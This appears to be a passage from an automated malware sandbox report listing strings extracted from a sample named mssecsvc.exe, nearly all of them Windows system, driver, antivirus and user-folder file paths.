                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\ListSvc.dll
                Source: mssecsvc.exe.2.drBinary string: ~\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Caches\{7CD55808-3D38-4DD5-90C9-62F0E6EE60D4}.2.ver0x0000000000000001.db
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\hidbth.sysH
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\arcsas.sysX
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netpacer.inf_locDa
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\msdtc.exe
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\wmpps.dll
                Source: mssecsvc.exe.2.drBinary string: U\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\fdeploy.dllW
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\Temp\SecurityScan_Release.exep
                Source: mssecsvc.exe.2.drBinary string: X\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Roaming\Microsoft
                Source: mssecsvc.exe.2.drBinary string: ,\Device\HarddiskVolume2\Windows\System32\ras$X
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catp
                Source: mssecsvc.exe.2.drBinary string: Z\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Windows.edb
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\vhdmp.sys
                Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\AppIDp
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\drmkaud.sysCP
                Source: mssecsvc.exe.2.drBinary string: #\Device\HarddiskVolume3\
                Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\Performance
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\errdev.sys
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\drmkaud.sys
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\WsmSvc.dll
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\ehome\ehprivjob.exe
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Drivers-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\nvstor.sysojec
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\csllog.cfgLL
                Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\inf\keyboard.PNF
                Source: mssecsvc.exe.2.drBinary string: m\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\Myp
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\wbem\WmiApSrv.exe
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\Temp\CR_6DDFF.tmp\setup.exekVh
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\evbdx.sys
                Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\System32\en
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\certprop.dll
                Source: mssecsvc.exe.2.drBinary string: L\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\desktop.inip
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\NV_AGP.SYS\S
                Source: mssecsvc.exe.2.drBinary string: W\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: O\Device\HarddiskVolume2\Windows\Temp\avg_a04392\avg-secure-search-installer.exep
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\rasacd.sys6
                Source: mssecsvc.exe.2.drBinary string: -\Device\HarddiskVolume2\Windows\inf\input.PNFp
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\w32time.dllBU
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\ru-RU\duser.dll.muiIOp
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\sisraid2.sys
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\parvdm.sysH
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\ssdpsrv.dllTD
                Source: mssecsvc.exe.2.drBinary string: >\Device\HarddiskVolume2\Program Files\AVG Web TuneUp\TBAPI.dllM
                Source: mssecsvc.exe.2.drBinary string: -\Device\HarddiskVolume2\Windows\inf\oem10.PNFp
                Source: mssecsvc.exe.2.drBinary string: L\Device\HarddiskVolume2\Program Files\Remote Access Host\RemoteSoundServ.exei
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\hdaudbus.inf_loc
                Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\System Volume Information\SystemRestore\FRStagingp
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\rasacd.sysH
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\mssrch.dll
                Source: mssecsvc.exe.2.drBinary string: P\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\battery.inf_loc
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\fveui.dllal8
                Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\System32\ru1
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netsstpt.inf_locBFFRp
                Source: mssecsvc.exe.2.drBinary string: ?\Device\HarddiskVolume2\Users\Public\Desktop\AVG Protection.lnk
                Source: mssecsvc.exe.2.drBinary string: c\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: {\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\parvdm.sys1
                Source: mssecsvc.exe.2.drBinary string: w\Device\HarddiskVolume2\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\Temporary Internet Files-1\
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\av16\temp\avg-2c059045-004a-4137-b301-6c3064f40275.tmpp
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\hcw85cir.sys
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\ProgramData\Microsoft\RAC\StateData
                Source: mssecsvc.exe.2.drBinary string: _\Device\HarddiskVolume2\$Recycle.Bin\S-1-5-21-1870734524-1274666089-2119431859-1000\desktop.ini
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Media-Foundation-Package~31bf3856ad364e35~x86~~6.1.7601.17514.catore.p
                Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\System32\en_CPU
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: O\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\CompositeBus.inf_loc
                Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\input.inf_locH
                Source: mssecsvc.exe.2.drBinary string: O\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v2.0.50727\mscorsvw.exe
                Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\ProgramData\Avg\log
                Source: mssecsvc.exe.2.drBinary string: Q\Device\HarddiskVolume2\ProgramData\AVG Web TuneUp\ChromeExt\4.3.7.452\install.js
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\av16\temp\avg-2c059045-004a-4137-b301-6c3064f40275.tmpb
                Source: mssecsvc.exe.2.drBinary string: D\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Ras
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\ndiscap.inf_loctform.
                Source: mssecsvc.exe.2.drBinary string: \\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Remote Access Hoste`
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\ipnat.sys
                Source: mssecsvc.exe.2.drBinary string: 9\Device\HarddiskVolume2\Windows\System32\drivers\mpio.sys
                Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\cpu.inf_locCC
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\msdsm.sys
                Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\System32\ega.cpiA^p
                Source: mssecsvc.exe.2.drBinary string: c\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex,
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\ndiscap.sysS,
                Source: mssecsvc.exe.2.drBinary string: j\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Administrative Tools\desktop.ini
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\circlass.sys
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\lsi_sas.sysM
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\ehome\ehrec.exe
                Source: mssecsvc.exe.2.drBinary string: n\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\System Tools\Desktop.ini/
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Hyper-V-Guest-Integration-Drivers-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: i\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\RemoteApp and Desktop Connections Update
                Source: mssecsvc.exe.2.drBinary string: @\Device\HarddiskVolume2\Windows\Prefetch\DLLHOST.EXE-766398D2.pf_Tp
                Source: mssecsvc.exe.2.drBinary string: ^\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Roaming\Microsoft\Windows
                Source: mssecsvc.exe.2.drBinary string: v\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: 6\Device\HarddiskVolume2\Windows\System32\WinSATAPI.dllp
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\iscsiexe.dll
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\nslog.cfgS
                Source: mssecsvc.exe.2.drBinary string: ?\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\msdsm.sysS1
                Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\lltdio.inf_loc
                Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\acpi.inf_loc
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientExtensions-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: ,\Device\HarddiskVolume2\Windows\Temp\_avast_p
                Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows Defender
                Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\inf\netsstpt.PNFwnp
                Source: mssecsvc.exe.2.drBinary string: O\Device\HarddiskVolume2\Windows\Temp\avg_a01924\avg-secure-search-installer.exe2
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\termsrv.dll
                Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\mshdc.inf_loc
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-LanguagePack-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Windows\System32\sdiagnhost.exe
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\WUDFRd.sys
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Backup-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-CodecPack-Basic-Package~31bf3856ad364e35~x86~~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\Tasks\WPD
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Program Files\AVG\UiDll@
                Source: mssecsvc.exe.2.drBinary string: S\Device\HarddiskVolume2\Windows\System32\config\systemprofile\Favorites\desktop.ini
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\av16\temp\avg-7e9df016-cbcc-4646-838e-02461299762d.tmp
                Source: mssecsvc.exe.2.drBinary string: J\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\msmouse.inf_loc
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\publog.cfgk
                Source: mssecsvc.exe.2.drBinary string: V\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.chkH
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\ehome\mcupdate.exe
                Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\cdrom.inf_loc
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\winsxs\x86_microsoft.windows.c..-controls.resources_6595b64144ccf1df_6.0.7600.16385_ru-ru_a13dea73a92ad990\comctl32.dll.muiME
                Source: mssecsvc.exe.2.drBinary string: 8\Device\HarddiskVolume2\Windows\System32\drivers\smb.sysH
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\schedlog.cfgp
                Source: mssecsvc.exe.2.drBinary string: a\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Desktop.inip
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\adpahci.sysp
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\gpprnext.dll
                Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Program Files\AVG\Av\avg_us.lngp
                Source: mssecsvc.exe.2.drBinary string: G\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\disk.inf_loc
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\adpahci.sys
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\ndisuio.PNFT`
                Source: mssecsvc.exe.2.drBinary string: j\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\avgidpagent.log.1
                Source: mssecsvc.exe.2.drBinary string: q\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Contentp
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\winsxs\FileMapsp
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\wbem\WmiPrvSE.exe
                Source: mssecsvc.exe.2.drBinary string: m\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: E\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\fvevol.sys.muip
                Source: mssecsvc.exe.2.drBinary string: x\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.001H
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\wbengine.exe&
                Source: mssecsvc.exe.2.drBinary string: h\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\log\av16\fixcfg.log.lockp
                Source: mssecsvc.exe.2.drBinary string: 0\Device\HarddiskVolume2\Windows\inf\usbvideo.PNF
                Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Program Files\AVG\Av\avg_ru.lng>"
                Source: mssecsvc.exe.2.drBinary string: .\Device\HarddiskVolume2\Windows\inf\wfplwf.PNF
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\cmdide.sysh
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\Performance\WinSAT
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\nfrd960.sys
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\WebClnt.dllG
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\fdPHost.dll
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\bthmodem.sys
                Source: mssecsvc.exe.2.drBinary string: H\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\cdrom.inf_locp
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Program Files\AVG\UiDll\2623
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Backup-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: z\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\GatherLogs\SystemIndex\SystemIndex.236.gthr
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\HpSAMD.sys01CP
                Source: mssecsvc.exe.2.drBinary string: f\Device\HarddiskVolume2\Users\
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Help-CoreClientUAUE-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.cat
                Source: mssecsvc.exe.2.drBinary string: k\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\megasas.sysPD
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\blbdrive.inf_loc
                Source: mssecsvc.exe.2.drBinary string: @\Device\HarddiskVolume2\Windows\System32\appidcertstorecheck.exezI
                Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\System32\en{STSp
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\blbdrive.inf_locH
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\vsmraid.sysp
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\rasmans.dll
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\usbmon.dll
                Source: mssecsvc.exe.2.drBinary string: K\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\netnwifi.inf_locPCF
                Source: mssecsvc.exe.2.drBinary string: r\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\CTLs1
                Source: mssecsvc.exe.2.drBinary string: X\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Windows Error ReportingPU
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\Temp\avg_a04392p
                Source: mssecsvc.exe.2.drBinary string: c\Device\HarddiskVolume2\ProgramData\Microsoft\Windows\Start Menu\Programs\Accessories\Accessibilityum
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\sffp_sd.sys
                Source: mssecsvc.exe.2.drBinary string: ,\Device\HarddiskVolume2\Windows\inf\disk.PNFH
                Source: mssecsvc.exe.2.drBinary string: T\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Local\Avg\av16p
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\System32\msdtc.exe}SDTL
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\mrxdav.sys
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\aelupsvc.dll
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010002.dirp
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\Indexer\CiFiles\00010001.ciT
                Source: mssecsvc.exe.2.drBinary string: L\Device\HarddiskVolume2\Windows\Microsoft.NET\Framework\v2.0.50727\dfsvc.exe
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\tssecsrv.sys
                Source: mssecsvc.exe.2.drBinary string: A\Device\HarddiskVolume2\Windows\System32\Speech\SpeechUX\sapi.cpl
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\modem.sysTEMPb
                Source: mssecsvc.exe.2.drBinary string: L\Device\HarddiskVolume2\Windows\ServiceProfiles\LocalService\AppData\Roaming\/
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\vms3cap.sysST
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\wacompen.sysp
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\sbp2port.sys
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\cmdide.sysLNKH
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\FntCache.dll
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\tdtcp.sys
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\nvraid.sys
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\msdtckrm.dll
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\Windows\System32\drivers\amdsata.sys
                Source: mssecsvc.exe.2.drBinary string: x\Device\HarddiskVolume2\ProgramData\Microsoft\Search\Data\Applications\Windows\Projects\SystemIndex\PropMap\CiPT0000.000H
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Program Files\AVG\Setup\avgsetupx.exep
                Source: mssecsvc.exe.2.drBinary string: D\Device\HarddiskVolume2\Windows\System32\drivers\ru-RU\amdk8.sys.muiL
                Source: mssecsvc.exe.2.drBinary string: +\Device\HarddiskVolume2\Windows\System32\ru{PDC
                Source: mssecsvc.exe.2.drBinary string: g\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\AVG\AV\cfgall\fixcfg.lockH8H
                Source: mssecsvc.exe.2.drBinary string: 8\Device\HarddiskVolume2\Windows\System32\NlsData0019.dllp
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Users\Public\Documents\desktop.ini
                Source: mssecsvc.exe.2.drBinary string: Q\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\AVG
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\bxvbdx.sys
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\mprdim.dll
                Source: mssecsvc.exe.2.drBinary string: r\Device\HarddiskVolume2\Windows\System32\config\systemprofile\AppData\Roaming\Microsoft\SystemCertificates\My\CTLsp
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\auditcse.dll
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\tbssvc.dllSTE
                Source: mssecsvc.exe.2.drBinary string: =\Device\HarddiskVolume2\Windows\System32\drivers\wacompen.sys
                Source: mssecsvc.exe.2.drBinary string: F\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\usb.inf_locp
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\NV_AGP.SYSH
                Source: mssecsvc.exe.2.drBinary string: \Device\HarddiskVolume2\Windows\System32\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Common-Modem-Drivers-Package~31bf3856ad364e35~x86~ru-RU~6.1.7601.17514.catH
                Source: mssecsvc.exe.2.drBinary string: I\Device\HarddiskVolume2\Windows\System32\DriverStore\ru-RU\lltdio.inf_locp
                Source: mssecsvc.exe.2.drBinary string: 7\Device\HarddiskVolume2\Windows\System32\drivers\wd.sys
                Source: mssecsvc.exe.2.drBinary string: ;\Device\HarddiskVolume2\Windows\System32\drivers\SISAGP.SYS
                Source: mssecsvc.exe.2.drBinary string: 2\Device\HarddiskVolume2\Windows\Fonts\segoeuii.ttfp
                Source: mssecsvc.exe.2.drBinary string: M\Device\HarddiskVolume2\Windows\System32\Tasks\Microsoft\Windows\Task Manager
                Source: mssecsvc.exe.2.drBinary string: ,\Device\HarddiskVolume2\Windows\inf\oem2.PNFp
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\DriverStore\en-USC
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\wecsvc.dll
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\modem.sysCu|
                Source: mssecsvc.exe.2.drBinary string: 3\Device\HarddiskVolume2\Windows\System32\TabSvc.dll
                Source: mssecsvc.exe.2.drBinary string: 4\Device\HarddiskVolume2\Windows\System32\advpack.dll
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\blackbox.dll
                Source: mssecsvc.exe.2.drBinary string: 5\Device\HarddiskVolume2\Windows\System32\ncobjapi.dllp
                Source: mssecsvc.exe.2.drBinary string: ,\Device\HarddiskVolume2\Windows\inf\oem9.PNF;
                Source: mssecsvc.exe.2.drBinary string: <\Device\HarddiskVolume2\ProgramData\Avg\log\AV16\history.xml
                Source: mssecsvc.exe.2.drBinary string: A\Device\HarddiskVolume2\ProgramData\Avg\AV\Chjw\avgpsi.db-journal
                Source: mssecsvc.exe.2.drBinary string: :\Device\HarddiskVolume2\Windows\System32\drivers\msdsm.sysh
                Source: mssecsvc.exe.2.drBinary string: 6\Device\HarddiskVolume2\Windows\System32\sqlceqp30.dll
                Source: mssecsvc.exe.2.drBinary string: /\Device\HarddiskVolume2\Windows\inf\netserv.PNFTMP8p
                Source: mssecsvc.exe.2.drBinary string: 1\Device\HarddiskVolume2\Windows\ehome\ehsched.exe
